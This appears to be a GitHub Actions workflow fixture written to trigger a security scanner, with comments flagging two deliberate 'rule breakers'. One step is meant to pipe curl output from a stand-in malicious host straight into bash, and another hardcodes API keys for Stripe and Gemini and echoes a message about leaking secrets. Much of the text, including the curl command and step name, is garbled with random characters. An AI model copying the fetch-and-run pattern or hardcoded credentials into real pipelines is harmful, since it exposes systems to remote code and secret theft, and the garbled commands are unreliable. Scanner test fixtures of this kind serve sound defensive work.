name: Broken Security Test
on: [push]

jobs:
  hack_me:
    runs-on: ubuntu-latest
    steps:
      - name: This will trigger the scanneferferfvs
        # RULE BREAKER 1: Piping curl to bash
        run:-sL http:cf vddd  c //maliciovdvdvfvffvdfvdfvus.coriptdccxccsdsdsdcds.shdscsdc
      - name: Leaking Secrets
        env:
          # RULE BREAKER 2: Hardcoded Secret
          STRIPE_KEY: "sk_live_51HvT..."
          GEMINI_KEY: "SDLFGHKdcsddsdsSFHGKHDSKFHGLHG"
        run: echo "I am leakingÂ secrets"
